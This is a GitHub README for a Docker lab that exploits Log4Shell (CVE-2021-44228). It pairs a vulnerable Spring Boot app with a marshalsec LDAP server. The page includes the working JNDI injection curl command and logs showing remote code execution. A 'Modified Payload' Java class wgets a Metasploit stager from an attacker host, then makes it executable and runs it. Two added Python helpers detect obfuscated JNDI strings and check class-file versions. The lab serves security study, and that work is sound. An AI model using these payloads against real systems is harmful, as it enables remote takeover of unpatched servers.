Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

Overview

log4shell-dockerlab

Credits

All credit goes to the original authors. I just git-cloned them and created a docker-compose file, that's all.

Description

This repository contains a docker-compose setup that starts an attacker LDAP server and a victim web server vulnerable to Log4Shell (CVE-2021-44228).

Components

Victim web server - log4shell-vulnerable-app: a Spring Boot web server running a vulnerable log4j. It logs a request header, which is where the first-stage payload (the JNDI lookup string) is injected.

Attacker LDAP server - marshalsec: an LDAP server that receives the JNDI lookup from the victim web server and answers with a reference pointing at the attacker web server.

Attacker web server: a python3 -m http.server instance that hosts the second-stage payload, Exploit.class, which the victim JVM downloads and loads.

Usage

Start the victim web server and the attacker LDAP server:

docker-compose up --build

Serve the second-stage payload. Port 8888 is hardcoded in the LDAP server's redirect URL; to change it, modify ./marshalsec/Dockerfile.

cd ./attacker-webserver
python3 -m http.server 8888

Attack

// Attack with the Log4Shell payload: a JNDI lookup string in a request header the victim logs
└─# curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'    

Hello, world!

// The docker-compose LDAP server answering the JNDI lookup with a reference to the attacker web server, and the victim then downloading Exploit.class. The ClassCastException is expected: the class's static initializer has already run by the time the JVM tries to cast it to ObjectFactory.
log4shell-dockerlab-targetweb-1  |
log4shell-dockerlab-jndi-1       | Send LDAP reference result for Exploit redirecting to http://172.17.0.1:8888/Exploit.class
log4shell-dockerlab-targetweb-1  | 2021-12-12 05:01:44,345 http-nio-8080-exec-7 WARN Error looking up JNDI resource [ldap://192.168.40.128:1389/Exploit]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: Exploit cannot be cast to javax.naming.spi.ObjectFactory]; remaining name 'Exploit'
log4shell-dockerlab-targetweb-1  |      at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1092)

// The attacker's web server serving the second-stage payload to the victim. The victim JVM executes it on load.
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
172.20.0.3 - - [12/Dec/2021 00:01:44] "GET /Exploit.class HTTP/1.1" 200 -

Check that the PoC worked

// Run docker ps and note the container ID of the "targetweb" container
└─# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED             STATUS          PORTS                                       NAMES
1131d694c91a   log4shell-dockerlab_jndi        "/usr/local/bin/mvn-…"   51 minutes ago      Up 51 minutes   0.0.0.0:1389->1389/tcp, :::1389->1389/tcp   log4shell-dockerlab-jndi-1
a2217b3781ad   log4shell-dockerlab_targetweb   "java -jar /app/spri…" 


// List /tmp in the victim container: the stock Exploit.class writes /tmp/log4shell-pwned, so its presence confirms code execution
└─# docker exec a2217b3781ad ls /tmp
hsperfdata_root
log4shell-pwned
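Added example (not part of this repository or of the upstream projects): a Python detector for the kind of lookup string injected in the Attack section above, run over a few constructed request headers. Naive matching on the literal text ${jndi: misses the nested lower/upper/default-value lookups attackers use to hide it, so the detector collapses those innermost-first, the way Log4j's substitution does, and then extracts the callback scheme, host and port for blocking or hunting. The hostnames and addresses in the sample lines are made up.

```python
import re
from typing import Optional

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the obfuscation is collapsed: ${jndi:<scheme>://<host>[:<port>]...
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+)://([^/:}\s]+)(?::(\d+))?", re.IGNORECASE)


def _resolve(m) -> str:
    body = m.group(1)
    prefix, _, arg = body.partition(":")
    prefix = prefix.lower()          # Log4j lower-cases the lookup prefix, so ${jNdI:...} works too
    if prefix == "jndi":
        return m.group(0)            # this is what we are hunting for; leave it visible
    if ":-" in body:                 # ${x:-default}: a failed lookup evaluates to its default
        return body.split(":-", 1)[1]
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    return m.group(0)                # date, env, sys ...: cannot be evaluated offline, keep literal


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lower/upper/default-value lookups, innermost first, until stable."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def analyze(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup hidden in a header or log line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {
        "raw": line,
        "normalized": norm,
        "scheme": m.group(1).lower(),
        "host": m.group(2),
        "port": int(m.group(3)) if m.group(3) else None,
    }


def scan(lines) -> list:
    """Run analyze() over an iterable of lines and keep only the hits."""
    return [hit for hit in map(analyze, lines) if hit]


# Constructed sample request headers (not taken from the page's logs): the plain lab payload,
# two obfuscated variants of the same lookup, and two benign lines (one with a harmless lookup).
SAMPLE_HEADERS = [
    "X-Api-Version: ${jndi:ldap://192.168.40.128:1389/Exploit}",
    "User-Agent: ${${lower:j}${upper:n}di:${::-l}dap://ldap.attacker.test:1389/a}",
    "X-Forwarded-For: ${${env:NOT_SET:-j}ndi:rmi://10.0.0.5/obj}",
    "Accept: application/json",
    "Referer: https://example.test/${date:yyyy}",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_HEADERS):
        print("%s -> %s://%s:%s" % (hit["raw"], hit["scheme"], hit["host"], hit["port"]))
```

The default-value rule is a heuristic: a real Log4j would first try the lookup (env, sys, ...) and only fall back to the default, but for detection the attacker-controlled default is the interesting branch. Unresolvable lookups are left literal so the loop always terminates.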

Usage - Modified Payload

Instead of the stock Exploit.java PoC, you can ship your own payload class.

Install a JDK if you don't have one:

apt install -y default-jdk

Modify the PoC. For example, you can test with Metasploit's multi/script/web_delivery.

// Modified PoC that fetches and runs a Metasploit web_delivery stager instead of the original "echo pwned > /tmp/log4shell-pwned" payload.
// The command lives in the static initializer, so it runs as soon as the victim JVM loads the class;
// the constructor and main() are only there so the class also compiles and runs stand-alone.

public class Rev {
    public Rev() {}
    static {
        try {
            // Pick a command for the victim's OS; the sh branch is what runs in this lab's Linux container.
            // Download the stager from the attacker host, make it executable and background it.
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"sh","-c", "wget -qO PqhJT1H2 --no-check-certificate http://192.168.40.128:7777/mhjfufvGzrRws; chmod +x PqhJT1H2; ./PqhJT1H2& disown"};
            java.lang.Runtime.getRuntime().exec(cmds).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
        Rev e = new Rev();
    }
}

Compile the second stage targeting Java 8 bytecode (class-file version 52.0): the log4shell-vulnerable-app was built on JDK 8, and its JVM rejects newer class versions with an UnsupportedClassVersionError. (Remote class loading through an LDAP reference, as used here, also relies on the victim running a JDK older than 8u191, where com.sun.jndi.ldap.object.trustURLCodebase still defaulted to true.)

// Compile for Java 8 (from JDK 9 or later; a JDK 8 javac emits version 52.0 by default)
javac --release 8 <your-payload>.java

// Sanity check: the class-file version must be 52.0 (Java 8)
└─# file Rev.class
Rev.class: compiled Java class data, version 52.0 (Java 1.8)
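Added example (not from the repository): a small Python check that does programmatically what the file command does above. It reads the class-file header (magic, minor, major), maps the major version to a Java release and refuses anything newer than 52 so the payload is never served to the JDK 8 victim by mistake. The two sample headers are constructed inline; the command-line path runs the same check on a real compiled payload.

```python
import struct
import sys

# Constructed sample headers (first bytes of a .class file), not taken from the page:
# magic 0xCAFEBABE, minor 0, major 52 (Java 8) and major 55 (Java 11).
SAMPLE_JAVA8 = bytes.fromhex("cafebabe00000034") + b"\x00\x10"   # trailing bytes are irrelevant here
SAMPLE_JAVA11 = bytes.fromhex("cafebabe00000037")


def class_file_version(data: bytes) -> tuple:
    """Return (major, minor) from a class-file header; raise ValueError if it is not a class file."""
    if len(data) < 8:
        raise ValueError("too short to be a class file")
    magic, minor, major = struct.unpack(">IHH", data[:8])   # big-endian u4 magic, u2 minor, u2 major
    if magic != 0xCAFEBABE:
        raise ValueError("bad magic 0x%08x, not a Java class file" % magic)
    return major, minor


def java_release(major: int) -> str:
    """Map a class-file major version to its JDK release name (45 = 1.1 ... 52 = 8, 55 = 11)."""
    return "1.%d" % (major - 44) if major < 49 else str(major - 44)


def loadable_by(data: bytes, target_major: int = 52) -> bool:
    """True if a JVM whose newest supported class-file version is target_major (52 = JDK 8) can load it."""
    major, _ = class_file_version(data)
    return major <= target_major


if __name__ == "__main__":
    # Usage: python3 classver.py Exploit.class [more.class ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            header = f.read(8)
        major, minor = class_file_version(header)
        verdict = "OK for JDK 8" if loadable_by(header) else "TOO NEW for the JDK 8 victim"
        print("%s: version %d.%d (Java %s) %s" % (path, major, minor, java_release(major), verdict))
```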

Host the file and attack again. Note that the LDAP server's reference always points at Exploit.class (see the "Send LDAP reference result" line in the log above), so the file you serve must be Exploit.class and the class inside it must be declared as public class Exploit; the JVM refuses to load a class whose name does not match the one requested. Either name your payload class accordingly or change the redirect target in ./marshalsec/Dockerfile.

python3 -m http.server 8888
curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'
e.g. curl 192.168.40.128:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.40.128:1389/Exploit}'

References

https://www.lunasec.io/docs/blog/log4j-zero-day/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

https://github.com/christophetd/log4shell-vulnerable-app

https://github.com/mbechler/marshalsec

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Comments
  • Error when running docker-compose up --build

    I am running sudo docker-compose up --build. The build fails with the following error.

    Step 4/9 : RUN gradle bootJar --no-daemon ---> Running in 6babbb1e881d

    Welcome to Gradle 7.3.1!

    Here are the highlights of this release:

    • Easily declare new test suites in Java projects
    • Support for Java 17
    • Support for Scala 3

    For more details see https://docs.gradle.org/7.3.1/release-notes.html

    To honour the JVM settings for this build a single-use Daemon process will be forked. See https://docs.gradle.org/7.3.1/userguide/gradle_daemon.html#sec:disabling_the_daemon. Daemon will be stopped at the end of the build

    FAILURE: Build failed with an exception.

    • Where: Build file '/home/gradle/src/build.gradle' line: 2

    • What went wrong: Plugin [id: 'org.springframework.boot', version: '2.6.1'] was not found in any of the following sources:

    • Gradle Core Plugins (plugin is not in 'org.gradle' namespace)
    • Plugin Repositories (could not resolve plugin artifact 'org.springframework.boot:org.springframework.boot.gradle.plugin:2.6.1') Searched in the following repositories: Gradle Central Plugin Repository
    • Try:

    Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

    • Get more help at https://help.gradle.org

    BUILD FAILED in 9s ERROR: Service 'targetweb' failed to build: The command '/bin/sh -c gradle bootJar --no-daemon' returned a non-zero code: 1

    Running on Ubuntu 20.04 with a fresh install of Docker and Docker-compose.

    Please advise.

    opened by Dave-0-0 2
Owner
ChoI
Former student at Rochester Institute of Technology Current tbh idk what I'm doing